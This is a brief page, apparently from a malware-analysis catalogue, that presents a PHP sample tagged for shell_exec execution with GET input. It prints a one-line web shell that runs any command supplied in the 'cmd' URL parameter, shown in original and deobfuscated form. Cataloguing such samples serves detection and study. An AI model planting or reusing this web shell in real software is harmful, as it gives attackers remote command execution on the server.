Toggle navigation
Beneri
Hash Game
Real Sec
Malware Analysis
About
PHP Malware Analysis
Back to list
Tags
Execution
shell_exec
Input
_GET
Deobfuscated code
<?php shell_exec($_GET["cmd"]);
Original code
<?php shell_exec($_GET["cmd"]); ?>